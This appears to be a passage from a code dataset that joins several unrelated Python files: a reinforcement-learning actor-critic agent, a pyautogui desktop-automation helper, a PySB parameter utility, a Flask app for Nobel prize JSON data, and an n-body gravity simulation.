self.ACTOR_SCOPE)\n self._actor_opt = tf.train.MomentumOptimizer(learning_rate=self._actor_stepsize, momentum=self._actor_momentum)\n self._update_actor_op = self._actor_opt.minimize(self._actor_loss_tf, var_list=actor_vars)\n return\n\n def _get_actor_inputs(self):\n norm_s_tf = self._s_norm.normalize_tf(self._s_tf)\n input_tfs = [norm_s_tf]\n return input_tfs\n\n def _get_critic_inputs(self):\n norm_s_tf = self._s_norm.normalize_tf(self._s_tf)\n input_tfs = [norm_s_tf]\n return input_tfs\n\n def _build_net_actor(self, input_tfs, reuse=False):\n h = net_util.build_conv_net(input_tfs=input_tfs, layers=self._actor_net_layers, reuse=reuse)\n norm_a_pd_tf = self._build_action_pd(input_tf=h, init_output_scale=self._actor_init_output_scale,\n reuse=reuse)\n return norm_a_pd_tf\n\n def _build_net_critic(self, input_tfs, reuse=False):\n out_size = 1\n h = net_util.build_conv_net(input_tfs=input_tfs, layers=self._critic_net_layers, reuse=reuse)\n norm_val_tf = tf.layers.dense(inputs=h, units=out_size, activation=None,\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\n reuse=reuse);\n norm_val_tf = tf.squeeze(norm_val_tf, axis=-1)\n return norm_val_tf\n \n def _update(self, iter, new_sample_count):\n idx = np.array(self._replay_buffer.get_unrolled_indices())\n \n end_mask = self._replay_buffer.is_path_end(idx)\n valid_mask = np.logical_not(end_mask)\n valid_idx = idx[valid_mask]\n valid_idx = np.column_stack([valid_idx, np.nonzero(valid_mask)[0]])\n \n # update critic\n vals = self._compute_batch_vals(idx)\n new_vals = self._compute_batch_new_vals(idx, vals)\n \n critic_steps = int(np.ceil(self._critic_steps * new_sample_count / self._samples_per_iter))\n critic_losses = self._update_critic(critic_steps, valid_idx, new_vals)\n\n # update actor\n vals = self._compute_batch_vals(idx)\n new_vals = self._compute_batch_new_vals(idx, vals)\n adv, norm_adv, adv_mean, adv_std = self._calc_adv(new_vals, vals, valid_mask)\n adv_weights, adv_weights_mean, adv_weights_min, adv_weights_max = self._calc_adv_weights(norm_adv, valid_mask)\n \n actor_steps = int(np.ceil(self._actor_steps * new_sample_count / self._samples_per_iter))\n actor_losses = self._update_actor(actor_steps, valid_idx, adv_weights)\n\n\n self._critic_step_count += critic_steps\n self._actor_step_count += actor_steps\n \n self._logger.log_tabular(\"Critic_Loss\", critic_losses[\"loss\"])\n self._logger.log_tabular(\"Critic_Steps\", self._critic_step_count)\n self._logger.log_tabular(\"Actor_Loss\", actor_losses[\"loss\"])\n self._logger.log_tabular(\"Actor_Steps\", self._actor_step_count)\n \n self._logger.log_tabular(\"Adv_Mean\", adv_mean)\n self._logger.log_tabular(\"Adv_Std\", adv_std)\n self._logger.log_tabular(\"Adv_Weights_Min\", adv_weights_min)\n self._logger.log_tabular(\"Adv_Weights_Mean\", adv_weights_mean)\n self._logger.log_tabular(\"Adv_Weights_Max\", adv_weights_max)\n \n info = {\"critic_info\": critic_losses, \"actor_info\": actor_losses}\n return info\n \n def _update_critic(self, steps, sample_idx, tar_vals):\n num_idx = sample_idx.shape[0]\n steps_per_shuffle = int(np.ceil(num_idx / self._critic_batch_size))\n losses = None\n\n for b in range(steps):\n if (b % steps_per_shuffle == 0):\n np.random.shuffle(sample_idx)\n\n batch_idx_beg = b * self._critic_batch_size\n batch_idx_end = batch_idx_beg + self._critic_batch_size\n critic_batch_idx = np.array(range(batch_idx_beg, batch_idx_end), dtype=np.int32)\n critic_batch_idx = np.mod(critic_batch_idx, num_idx)\n\n critic_batch = sample_idx[critic_batch_idx]\n critic_batch_vals = tar_vals[critic_batch[:,1]]\n critic_s = self._replay_buffer.get(\"states\", critic_batch[:,0])\n\n curr_losses = self._step_critic(critic_s, critic_batch_vals)\n\n if (losses is None):\n losses = curr_losses\n else:\n for key, val in curr_losses.items():\n losses[key] += val\n \n for key in losses.keys():\n losses[key] /= steps\n\n return losses\n\n def _update_actor(self, steps, sample_idx, adv_weights):\n num_idx = sample_idx.shape[0]\n steps_per_shuffle = int(np.ceil(num_idx / self._actor_batch_size))\n losses = None\n\n for b in range(steps):\n if (b % steps_per_shuffle == 0):\n np.random.shuffle(sample_idx)\n\n batch_idx_beg = b * self._actor_batch_size\n batch_idx_end = batch_idx_beg + self._actor_batch_size\n actor_batch_idx = np.array(range(batch_idx_beg, batch_idx_end), dtype=np.int32)\n actor_batch_idx = np.mod(actor_batch_idx, num_idx)\n \n actor_batch = sample_idx[actor_batch_idx]\n actor_batch_adv = adv_weights[actor_batch[:,1]]\n actor_s = self._replay_buffer.get(\"states\", actor_batch[:,0])\n actor_a = self._replay_buffer.get(\"actions\", actor_batch[:,0])\n\n curr_losses = self._step_actor(actor_s, actor_a, actor_batch_adv)\n\n if (losses is None):\n losses = curr_losses\n else:\n for key, val in curr_losses.items():\n losses[key] += val\n \n for key in losses.keys():\n losses[key] /= steps\n\n return losses\n\n def _step_critic(self, s, tar_vals):\n feed = {\n self._s_tf: s,\n self._tar_val_tf: tar_vals\n }\n\n run_tfs = [self._update_critic_op, self._critic_loss_tf]\n losses = self._sess.run(run_tfs, feed)\n losses = {\"loss\": losses[1]}\n return losses\n \n def _step_actor(self, s, a, a_w):\n feed = {\n self._s_tf: s,\n self._a_tf: a,\n self._a_w_tf: a_w,\n }\n\n run_tfs = [self._update_actor_op, self._actor_loss_tf]\n losses = self._sess.run(run_tfs, feed)\n losses = {\"loss\": losses[1]}\n return losses\n \n def _compute_batch_vals(self, idx):\n states = self._replay_buffer.get(\"states\", idx)\n vals = self.eval_critic(states)\n\n is_end = self._replay_buffer.is_path_end(idx)\n is_fail = self._replay_buffer.check_terminal_flag(idx, rl_path.Terminate.Fail)\n is_fail = np.logical_and(is_end, is_fail) \n\n vals[is_fail] = 0.0\n\n return vals\n\n def _compute_batch_new_vals(self, idx, val_buffer):\n # use td-lambda to compute new values\n new_vals = np.zeros_like(val_buffer)\n n = len(idx)\n\n start_i = 0\n while start_i < n:\n start_idx = idx[start_i]\n path_len = self._replay_buffer.get_pathlen(start_idx)\n end_i = start_i + path_len\n end_idx = idx[end_i]\n\n test_start_idx = self._replay_buffer.get_path_start(start_idx)\n test_end_idx = self._replay_buffer.get_path_end(start_idx)\n assert(start_idx == test_start_idx)\n assert(end_idx == test_end_idx)\n\n path_indices = idx[start_i:(end_i + 1)]\n r = self._replay_buffer.get(\"rewards\", path_indices[:-1])\n v = val_buffer[start_i:(end_i + 1)]\n\n new_vals[start_i:end_i] = self._compute_return(r, self._discount, self._td_lambda, v)\n start_i = end_i + 1\n \n return new_vals\n\n def _compute_return(self, rewards, discount, td_lambda, val_t):\n # computes td-lambda return of path\n path_len = len(rewards)\n assert len(val_t) == path_len + 1\n\n return_t = np.zeros(path_len)\n last_val = rewards[-1] + discount * val_t[-1]\n return_t[-1] = last_val\n\n for i in reversed(range(0, path_len - 1)):\n curr_r = rewards[i]\n next_ret = return_t[i + 1]\n curr_val = curr_r + discount * ((1.0 - td_lambda) * val_t[i + 1] + td_lambda * next_ret)\n return_t[i] = curr_val\n \n return return_t\n\n def _calc_adv(self, new_vals, vals, valid_mask):\n adv = new_vals - vals\n\n valid_adv = adv[valid_mask]\n adv_mean = np.mean(valid_adv)\n adv_std = np.std(valid_adv)\n\n norm_adv = (adv - adv_mean) / (adv_std + self.ADV_EPS)\n return adv, norm_adv, adv_mean, adv_std\n\n def _calc_adv_weights(self, adv, valid_mask):\n weights = np.exp(adv / self._temp)\n\n valid_weights = weights[valid_mask]\n weights_mean = np.mean(valid_weights)\n weights_min = np.min(valid_weights)\n weights_max = np.max(valid_weights)\n\n weights = np.minimum(weights, self._weight_clip)\n return weights, weights_mean, weights_min, weights_max\n","sub_path":"awr/learning/conv_awr_agent.py","file_name":"conv_awr_agent.py","file_ext":"py","file_size_in_byte":15736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"562488182","text":"import pyautogui\r\nimport time\r\nimport subprocess\r\nimport matplotlib.pyplot as plt\r\nfrom typing import Union\r\nimport functools\r\nimport pyscreeze\r\nimport os\r\nimport mss\r\nfrom PIL import Image\r\nimport pywinauto\r\nimport pygetwindow as gw\r\nimport datetime\r\nimport re\r\nimport pygetwindow._pygetwindow_win\r\n\r\n######################################## Baseline functions ################################################################\r\ndef detect_monitor(my_operating_monitor = 0, verbose = True):\r\n sct = mss.mss()\r\n combined_resolution = sct.monitors[0]\r\n each_resolution = sct.monitors[1:]\r\n if verbose is True:\r\n msg = ''\r\n for i in range(len(each_resolution)):\r\n msg += f\"\\nmonitor {i}| position: ({each_resolution[i]['left']}, {each_resolution[i]['top']})| size: ({each_resolution[i]['width']}x{each_resolution[i]['height']})\"\r\n print(f'detected {len(each_resolution)} monitors.'+msg)\r\n\r\n print(f'selected monitor is monitor \"{my_operating_monitor}\"')\r\n res = []\r\n for k, v in each_resolution[my_operating_monitor].items():\r\n res.append(v)\r\n return tuple(res)\r\n\r\ndef locate(*images, For=0.0, region=None, grayscale=None, confidence: Union[float,list]=0.8, verbose = False):\r\n imglist = list(images)\r\n retVal = [None] * len(imglist)\r\n if region is None:\r\n region = detect_monitor(-1, verbose = False) # default monitor is the last(rightmost) one.\r\n start = time.time()\r\n if not isinstance(confidence, list):\r\n confidence = [confidence]\r\n while True:\r\n with mss.mss() as sct:\r\n ltrb = (region[0], region[1], region[0] + region[2], region[1] + region[3])\r\n x = sct.grab(monitor=ltrb)\r\n screenshotIm = Image.frombytes(\"RGB\", x.size, x.bgra, \"raw\", \"BGRX\")\r\n for i in range(len(imglist)):\r\n for conf in confidence:\r\n try:\r\n imglist[i] = pyscreeze._load_cv2(imglist[i], grayscale = grayscale)\r\n bbox = pyscreeze.locate(imglist[i], screenshotIm, grayscale = grayscale, confidence = conf)\r\n retVal[i] = (int(bbox[0] + bbox[2]/2 + region[0]), int(bbox[1] + bbox[3]/2) + region[1])\r\n del imglist[i]\r\n if verbose is True:\r\n print(f'{i}th image found on confidence {conf}')\r\n except OSError as e:\r\n raise e\r\n except Exception:\r\n pass\r\n if any(retVal) or time.time() - start > For:\r\n if len(retVal) == 1:\r\n return retVal[0], screenshotIm\r\n else:\r\n return retVal, screenshotIm\r\n\r\ndef click(x=None, y=None, n=1, interval=0.0, button=pyautogui.PRIMARY, duration=0.0, tween=pyautogui.linear, pause=0.0, logScreenshot=False, ori = True):\r\n if isinstance(x, tuple) and y is None:\r\n x, y = x\r\n for _ in range(n):\r\n ori_x, ori_y = pyautogui.position()\r\n pyautogui.click(x = x, y = y, button = button, duration = duration,tween = tween,logScreenshot = logScreenshot, _pause = False)\r\n if ori is True:\r\n pyautogui.moveTo(ori_x, ori_y)\r\n time.sleep(interval)\r\n time.sleep(pause)\r\n\r\nclass image():\r\n def __init__(self, *paths, confidence: Union[float, list] = 0.8, region = None, grayscale = None, verbose = False, home = '', extension = ''):\r\n # Variable initialization\r\n if not home and not extension:\r\n self.paths = paths\r\n else:\r\n self.paths = tuple(home + path + extension for path in paths)\r\n if not isinstance(confidence, list):\r\n self.confidence = [confidence]\r\n self.clicked = False\r\n self.region = region\r\n self.grayscale = grayscale\r\n self.scr, self.location, self.exist = self.locate_images()\r\n if verbose is True:\r\n self.verbose(verbose)\r\n def locate_images(self):\r\n # for plural *paths: \"any(image(*paths).exist)\" and \"all(image(*paths).exist)\" are allowed\r\n # for singular path: \"image(path).exist\" is allowed\r\n res, scr = locate(*self.paths, confidence = self.confidence, region = self.region, grayscale = self.grayscale, verbose = False)\r\n if not isinstance(res, list):\r\n res = [res]\r\n if len(res) == 1:\r\n return scr, res[0], bool(res[0])\r\n else:\r\n return scr, res, [bool(item) for item in res]\r\n def click(self, n = 1, ax = 0, ay = 0, interval=0.0, duration=0.0, tween=pyautogui.linear, pause=0.0, button=pyautogui.PRIMARY, ori = False):\r\n if not isinstance(self.exist, list):\r\n exist = [self.exist]\r\n else:\r\n exist = self.exist\r\n if any(exist) is False:\r\n return\r\n else:\r\n for i in range(len(exist)):\r\n if exist[i] is True:\r\n if len(self.paths) == 1:\r\n x, y = self.location\r\n else:\r\n x, y = self.location[i]\r\n click(x + ax, y + ay, n, interval, button, duration, tween, pause, ori = ori)\r\n self.clicked = True\r\n return\r\n\r\n def verbose(self, v):\r\n # display images\r\n n_img = len(self.paths)\r\n if v is True:\r\n if n_img == 1:\r\n plt.imshow(plt.imread(self.paths[0]))\r\n plt.show()\r\n else:\r\n fig = plt.figure()\r\n for i in range(n_img):\r\n fig.add_subplot(1, n_img, i + 1)\r\n plt.imshow(plt.imread(self.paths[i]))\r\n plt.show()\r\n\r\ndef exception(exc): # if exception met, abandon all turn progress. And goto specific turn.\r\n for item in exc:\r\n if image(item[0], verbose=False).exist:\r\n return True, item[1]\r\n\r\ndef debug_process(scr, turn, done):\r\n if scr is None:\r\n return\r\n now = datetime.datetime.today()\r\n name = now.strftime('%Y-%m-%d_%H')\r\n if name not in os.listdir():\r\n os.mkdir(name)\r\n with open(f'./{name}/{name}.txt', 'w', encoding = 'utf-8') as f:\r\n f.write('')\r\n scr.save(f'./{name}/{turn}.png')\r\n with open(f'./{name}/{name}.txt', 'a') as f:\r\n f.write(f\"{turn}/{'fail'*(not done)}+{'success'*done}\")\r\n return\r\n\r\ndef focus_to_window(window_title=None):\r\n window = gw.getWindowsWithTitle(window_title)[0]\r\n if window.isActive == False:\r\n pywinauto.application.Application().connect(handle=window._hWnd).top_window().set_focus()\r\ndef change_turns(below, n):\r\n matches = re.finditer(f'(if turn ?== ?(\\d+))|(goto\\((\\d+)\\))', below, re.MULTILINE)\r\n k = 0\r\n for matchNum, match in enumerate(matches):\r\n if match.groups()[1]:\r\n number_part = 1\r\n elif match.groups()[3]:\r\n number_part = 3\r\n ind = match.span(number_part + 1)\r\n old_num = match.groups()[number_part]\r\n new_num = int(old_num) + n\r\n below = below[:ind[0] + k] + str(new_num) + below[ind[1] + k:]\r\n if len(str(new_num)) > len(old_num):\r\n k += 1\r\n return below\r\ndef getWindowForever(title):\r\n window = []\r\n while not window:\r\n window = pyautogui.getWindowsWithTitle(title)\r\n window = window[0]\r\n return window # type: pygetwindow._pygetwindow_win.Win32Window\r\n\r\n# attach \"turn_controller\" to any action. action return should contain boolean\r\ndef turn_controller(action, debug_env = True):\r\n def wrapper_function(*args, fail_then_to = None, For = 3.0, pause = 2.0, exc = (), **kwargs):\r\n # init\r\n global turn; turn_before = turn\r\n global again\r\n if again is False:\r\n For = 0\r\n timeout = time.time() + For\r\n # keep doing the action until {timeout}\r\n while True:\r\n # action_return will be either (done:bool, scr:Image) or (done:bool,)\r\n action_return = action(*args, **kwargs)\r\n if isinstance(action_return, bool):\r\n done = action_return\r\n else: # in case action_return is (True, Image) or (True,)\r\n done = action_return[0]\r\n if len(action_return) == 2:\r\n scr = action_return[1] # type:PIL.Image.Image\r\n else:\r\n scr = None\r\n if done:\r\n turn += 1\r\n again = True\r\n after_done = time.time()\r\n break\r\n # after timeout, 3 cases\r\n if time.time() > timeout:\r\n # 1. exception check : when exception -> goto specified turn\r\n exc_res = exception(exc)\r\n if exc_res is not False:\r\n turn = exc_res[1]\r\n break\r\n # 2. again is True: go back in default\r\n elif again is True:\r\n if fail_then_to:\r\n turn = fail_then_to\r\n break\r\n else:\r\n turn -= 1\r\n break\r\n # 3. again is False: move on to next turn\r\n else:\r\n turn += 1\r\n break\r\n\r\n print(f\"turn {turn_before} : {'fail'*(not done)}+{'success'*done} --> {turn}\")\r\n if debug_env is True:\r\n debug_process(scr, turn_before, done)\r\n while time.time() - after_done < pause:\r\n time.sleep(0.1) # 디버그 등등 이후에도 pause 가 더 남았으면, 그냥 기다림\r\n return\r\n return wrapper_function\r\n\r\n@turn_controller\r\ndef try_click(*img_paths, region = None, confidence = 0.8, n = 1, nSearch = False, interval = 2.0, ax = 0, ay = 0, verbose = True):\r\n img = image(*img_paths, confidence = confidence, verbose = verbose, region = region)\r\n if nSearch is False:\r\n if interval == 2.0:\r\n interval = 0.3\r\n img.click(n = n, interval = interval, ax=ax, ay=ay)\r\n if nSearch is True:\r\n while True:\r\n img.click(n = 1, ax = ax, ay = ay)\r\n if img.clicked is True:\r\n n -= 1\r\n img.clicked = False\r\n time.sleep(interval)\r\n if n < 1:\r\n break\r\n return True, img.scr\r\n\r\ndef goto(to: Union[int,float]):\r\n global turn\r\n print(f'turn has been redirected: {turn} --> {to}')\r\n turn = to\r\n\r\n@turn_controller\r\ndef drag(From:tuple, To:tuple, duration=0.3):\r\n from_x, from_y = From\r\n To_x, To_y = To\r\n ori_x, ori_y = pyautogui.position()\r\n pyautogui.moveTo(from_x, from_y)\r\n pyautogui.dragTo(To_x, To_y, duration=duration)\r\n pyautogui.moveTo(ori_x, ori_y)\r\n return True\r\n######################################## Utility functions ############################################################\r\n\r\ndef spacing(turn, n, script_name = None):\r\n if script_name is None:\r\n script_name = __file__\r\n if script_name is '<input>':\r\n script_name = 'pyauto.py'\r\n if script_name not in os.listdir():\r\n print(\"if you are using interactive interpreter like pycharm's console and changed script name from pyauto.py,\"\r\n f\" you should specify current script name. || detected default script_name : {script_name}\")\r\n with open(script_name, mode='r') as f:\r\n script = f.read()\r\n\r\n pattern = re.compile(f'if turn ?== ?{turn}')\r\n until = pattern.search(script).span()[0]\r\n above = script[:until]\r\n below = script[until:]\r\n below = change_turns(below, n)\r\n\r\n script = above + below\r\n\r\n with open(script_name, mode = 'w') as f:\r\n f.write(script)\r\n#################################################################### What you are likely to do #####################\r\n### Basic actions\r\n# image('image1').exist\r\n# image('image1').location\r\n# image('image1').click()\r\n# image('image1').clicked\r\n# x, y = locate('image1','image2', confidence = 0.8)\r\n# click(x, y, n = 12)\r\n# drag(from = window.bottom, to = image('image2').location)\r\n# goto(10)\r\n\r\n### check window status and switch around\r\n# window.activate()\r\n# window.maximize() # pyautogui is scale dependent, so never ever try to detect an image at different scales\r\n# window.center\r\n# window.box\r\n# window.moveTo() # pyautogui only works on main monitor. So, move it to main monitor.\r\n\r\n### Mouse Drag templete\r\n# pyautogui.moveTo(window.center) # pyautogui.moveTo(image('an_image.png').location)\r\n\r\n### modify default parameters: you can change source function, or below\r\n# try_click = functools.partial(try_click, For = 10) # change default parameters. applied to all try_click actions\r\n# try_click = functools.partial(try_click, ) # change default parameters. applied to all try_click actions\r\n\r\n### miscellaneous\r\n# pyautogui.typewrite() # keyboard typing\r\n# proc.kill()\r\n\r\n### Syntax example\r\n# if image('image1').exist:\r\n# image('image2').click(n = 2)\r\n######################################## User Configuration ############################################################\r\nif __name__ == \"__main__\":\r\n class image(image): # inherit image class and modify it. without it, image class gets absolute path.\r\n def __init__(self, *paths, confidence: Union[float, list] = 0.8, region = None, grayscale = None, verbose = False, home = '', extension = ''):\r\n if not home: # No specific parameter for home. then,\r\n home = './' # give default parameters\r\n elif not home.endswith('/'): # in case you missed out slash\r\n home = home + '/'\r\n if not extension:\r\n extension = '.png'\r\n if not region: # No specific parametor for which monitor. then,\r\n region = detect_monitor(-1, verbose = False) # the rightmost monitor is where image locate works.\r\n # or you can specify small region where locate_image works, like region = tuple(left, top, width, height)\r\n # specifying small region increases locating speed dramatically, because taking a screenshot itself takes long time.\r\n super().__init__(*paths, confidence = confidence, region = region, grayscale = grayscale, verbose = verbose, home = home, extension = extension)\r\n def click(self, n = 1, ax = 0, ay = 0, interval=0.0, duration=0.0, tween=pyautogui.linear, pause=0.0, logScreenshot=False, button=pyautogui.PRIMARY):\r\n super().click(n = n, ax = ax, ay = ay, interval=interval, duration=duration, tween=tween, pause=pause, button=button)\r\n\r\n exc = (('0_exception', -10),) # check everytime if this image exists. then, go to the specified turn.\r\n exc = () # disable exception checking\r\n exception = functools.partial(exception, exc = exc)\r\n\r\n proc = subprocess.Popen('Program_path_you_want_to_run');time.sleep(3)\r\n\r\n window = getWindowForever(\"window_title\")\r\n x,y,w,h = detect_monitor(-1)\r\n window.moveTo(x,y)\r\n window.resizeTo(w,h)\r\n\r\n x_qua = window.size[0]/3\r\n y_qua = window.size[1]/3\r\n center = window.center\r\n top = (window.center[0], window.center[1] - y_qua) # 1/4 from top\r\n bottom = (window.center[0], window.center[1] + y_qua) # 3/4 from bottom\r\n left = (window.center[0] - x_qua, window.center[1])\r\n right = (window.center[0] + x_qua, window.center[1])\r\n\r\n global_count = 1\r\n turn = 1\r\n checkpoint = 0\r\n turn_history = []\r\n loop_count = 0\r\n count = 1\r\n while global_count >= 1:\r\n if turn == -10: # when there is critical exception, you can restart from exceptional turn -10\r\n proc.kill()\r\n time.sleep(3)\r\n subprocess.Popen('your_program')\r\n time.sleep(20)\r\n goto(1)\r\n\r\n ################################################ BODY BORDER ###########################################################\r\n if turn == 999:\r\n proc.kill()\r\n\r\n turn_history.append(turn)\r\n loop_count += 1\r\n if loop_count > 100:\r\n loop_count = 0\r\n if len(set(turn_history[-50:])) < 3 and count == 1:\r\n break","sub_path":"pyturn_factory.py","file_name":"pyturn_factory.py","file_ext":"py","file_size_in_byte":16233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30095745","text":"from pysb.util import rules_using_parameter\nfrom pysb import Parameter, ComponentSet\n\ndef merge_parameters(model, new_name, parameters):\n unique_values = {parameter.value for parameter in parameters}\n if len(unique_values) > 1:\n raise ValueError(\"Given parameters have different values: %s\" %\n (', '.join('%s=%g' % (p.name, p.value)\n for p in parameters)))\n value = parameters[0].value\n rules = ComponentSet()\n for parameter in parameters:\n rules |= rules_using_parameter(model, parameter)\n if not rules:\n raise ValueError(\"Model has no rules using given parameters: %s\" %\n ', '.join(p.name for p in parameters))\n try:\n new_parameter = model.parameters[new_name]\n if new_parameter.value != value:\n raise ValueError(\"Parameter %s is already present in the model \"\n \"with the value %g, which differs from the \"\n \"common value of the given parameters, %g\" %\n (new_parameter.name, new_parameter.value, value))\n except KeyError:\n new_parameter = Parameter(new_name, value)\n model.add_component(new_parameter)\n for rule in rules:\n for attr in 'rate_forward', 'rate_reverse':\n if getattr(rule, attr) in parameters:\n setattr(rule, attr, new_parameter)\n","sub_path":"rasmodel/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"36597873","text":"#!/usr/bin/env python\n\n#import necessary libraries\n# pip install flask \n#export FLASK_APP=flask-app\n#flask run\nfrom flask import Flask, json, flash,render_template, session,request,jsonify,redirect, url_for\nimport os\nimport pandas as pd\npd.set_option('display.max_columns',15)\n\n#create instance of Flask app\napp = Flask(__name__)\n\n#decorator \n@app.route(\"/\")\ndef echo_hello():\n return \"<p>Hello Nobel.json!!!!!</p>\"\n\n@app.route(\"/all\")\ndef nobel():\n json_url = os.path.join(app.static_folder,\"\",\"nobel.json\")\n data_json = json.load(open(json_url))\n return render_template('index.html',data=data_json)\n\n\n@app.route(\"/<year>\",methods=[\"GET\",\"POST\"])\ndef nobel_year(year):\n json_url = os.path.join(app.static_folder,\"\",\"nobel.json\")\n data_json = json.load(open(json_url))\n data = data_json['prizes']\n year = request.view_args['year']\n\n if request.method == \"GET\":\n output_data = [x for x in data if x['year']==year]\n return render_template('user_nobel.html',data=output_data)\n\n elif request.method == \"POST\":\n category = request.form['category']\n id=request.form[\"id\"]\n firstname=request.form['firstname']\n surname=request.form['surname']\n motivation=request.form['motivation']\n share=request.form['share']\n create_row_data= {'year': year, 'category': category, 'laureates': [{'id': id, 'firstname': firstname, 'surname': surname,'motivation': motivation, 'share': share}]}\n print (create_row_data)\n filename='./static/nobel.json'\n with open(filename,'r+') as file:\n file_data = json.load(file)\n file_data['prizes'].append(create_row_data)\n file.seek(0)\n json.dump(file_data, file, indent = 4)\n \n return render_template('user_nobel.html',data=create_row_data)\n \n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"flask-nobel1/flask-nobel1.py","file_name":"flask-nobel1.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322583604","text":"from lib import Particle, Vector\nfrom matplotlib import pyplot as plt\nfrom statistics import stdev, mean\nfrom math import sqrt\nfrom multiprocessing import Process, Manager\n\nclass Universe:\n def __init__(self, tickScalingFactor, density=2650):\n self.parts = []\n self.tickLen = 0\n self.tickSF = tickScalingFactor\n self.density = density\n plt.ion()\n self.touches = 0\n self.g = 6.67*(10**(-11))\n self.cullat = 40000000000000\n\n def randomize(self, numParts, minPos, maxPos, minVel, maxVel, minSize, maxSize,):\n self.parts = [Particle.rand_part(minPos, maxPos, minSize, maxSize, minVel, maxVel, self.density) for i in range(numParts)]\n self.xmin = minPos.x\n self.xmax = maxPos.x\n self.ymin = minPos.y\n self.ymax = maxPos.y\n self.avgVel = sum(abs(p.velocity) for p in self.parts) / len(self.parts)\n self.avgSize = sum(p.size for p in self.parts) / len(self.parts)\n self.totalMass = sum(p.size for p in self.parts)\n\n\n def par_run_helper(self, part, destroy, add):\n for other in self.parts:\n if other not in destroy and other is not part:\n if part.touches(other):\n add.append(part + other)\n destroy.append(other)\n destroy.append(part)\n self.touches += 1\n #print(\"TOUCH \" + str(part.size + other.size))\n else:\n part.interact(other, self.g)\n\n def par_run(self, numTicks=1, visualizeEvery=1, visualizeAfter=0):\n manager = Manager()\n destroy = manager.list()\n add = manager.list()\n for tick in range(numTicks):\n #print(tick)\n processes = []\n for part in self.parts:\n p = Process(target=self.par_run_helper, args=(part, destroy, add))\n p.start()\n processes+=[p]\n print(len(processes))\n print('start')\n for p in processes:\n p.join()\n print('end')\n for p in destroy:\n try:\n self.parts.remove(p)\n except Exception:\n pass\n for p in add:\n self.parts.append(p)\n\n self.avgVel = sum(abs(p.velocity) for p in self.parts) / len(self.parts)\n self.avgSize = sum(p.size for p in self.parts) / len(self.parts)\n #self.tickLen = 500000000 / self.avgVel#(((self.avgSize/self.density)**(1/3)) * 2) / self.avgVel\n\n for part in self.parts:\n part.move(self.tickLen)\n # if part.position.x < self.xmin:\n # self.xmin = part.position.x\n # if part.position.x > self.xmax:\n # self.xmax = part.position.x\n # if part.position.y < self.ymin:\n # self.ymin = part.position.y\n # if part.position.y > self.ymax:\n # self.ymax = part.position.y\n\n self.visualize(tick)\n\n def run(self, numTicks=1, visualizeEvery=1, visualizeAfter=0):\n for tick in range(numTicks):\n if len(self.parts) == 1:\n exit()\n\n destroy = []\n add = []\n for i, part in enumerate(self.parts):\n\n\n for other in self.parts[i+1:]:\n if other not in destroy:\n if part.touches(other):\n #add.extend(part.collide(other))\n add.append(part + other)\n destroy.append(other)\n destroy.append(part)\n self.touches += 1\n #print(\"TOUCH \" + str(part.size + other.size))\n else:\n part.interact(other, self.g)\n # if abs(part.velocity) > sqrt((2*self.g * (self.totalMass - part.size))/abs(part.position)):\n # #destroy.append(part)\n # part.velocity *= .75\n # # print(abs(part.velocity))\n # # print(sqrt((2*self.g * (self.totalMass - part.size))/abs(part.position)))\n # # print(\"Escape velocity reached!\")\n\n if part.total_dist > self.cullat:\n print('part destroyed with dist ' + str(part.total_dist))\n print(len(self.parts))\n destroy.append(part)\n\n for p in destroy:\n try:\n self.parts.remove(p)\n except Exception:\n pass\n for p in add:\n self.parts.append(p)\n\n self.avgVel = sum(abs(p.velocity) for p in self.parts) / len(self.parts)\n self.avgSize = sum(p.size for p in self.parts) / len(self.parts)\n self.cullat = max(self.cullat - tick*1000000000, 10000000000000)\n # print(self.cullat)\n # print(max(p.total_dist for p in self.parts), max(abs(p.velocity) for p in self.parts))\n #self.tickLen = 500000000 / self.avgVel#(((self.avgSize/self.density)**(1/3)) * 2) / self.avgVel\n\n for part in self.parts:\n part.move(self.tickLen)\n # if part.position.x < self.xmin:\n # self.xmin = part.position.x\n # if part.position.x > self.xmax:\n # self.xmax = part.position.x\n # if part.position.y < self.ymin:\n # self.ymin = part.position.y\n # if part.position.y > self.ymax:\n # self.ymax = part.position.y\n\n self.visualize(tick)\n\n def visualize(self, tick):\n plt.subplot().clear()\n axes = plt.gca()\n sf = 10\n\n try:\n xmean = mean(p.position.x for p in self.parts)\n xstdev = stdev(p.position.x for p in self.parts)\n\n ymean = mean(p.position.y for p in self.parts)\n ystdev = stdev(p.position.y for p in self.parts)\n\n self.xmin = xmean - 1.5 * xstdev\n self.xmax = xmean + 1.5 * xstdev\n self.ymin = ymean - 1.5 * ystdev\n self.ymax = ymean + 1.5 * ystdev\n except:\n pass\n\n self.tickLen = self.tickSF * (((self.xmax - self.xmin) + (self.ymax - self.ymin)) / 50000000000)\n\n axes.set_xlim([self.xmin, self.xmax])\n axes.set_ylim([self.ymin, self.ymax])\n plt.subplot().set_title('tick: ' + str(tick) + '\\nUnits: ' + str(len(self.parts)) + '\\nTick Length: ' + str(self.tickLen))\n for part in self.parts:\n c = plt.Circle(part.get_pos(), ((part.size/self.density)**(1/3))*sf, fill=True)\n plt.gca().add_artist(c)\n plt.pause(.001)\n\n def test(self):\n import pickle\n for i in range(300):\n pickle.loads(pickle.dumps(self))\n\n\nif __name__ == '__main__':\n destroy = []\n add = []\n uni = Universe(.9)\n # uni.xmin = -100000000\n # uni.xmax = 100000000\n # uni.ymin = -100000000\n # uni.ymax = 100000000\n # uni.parts.append(Particle(Vector(-100000000, 100000), 5*10**25, Vector(1, 0), uni.density))\n # uni.parts.append(Particle(Vector(100000000, -100000), 5*10**25, Vector(-1, 0), uni.density))\n uni.randomize(600, Vector(-1.5*(10**11), -1.5*(10**11)), Vector(1.5*(10**11), 1.5*(10**11)), Vector(-10, -10), Vector(10, 10), 10**23, 10**25)\n import timeit\n timeit.Timer()\n uni.run(100000)\n print('next')\n uni.test()\n print('done')\n #uni.par_run(1)\n #print(timeit.timeit(uni.par_run))\n 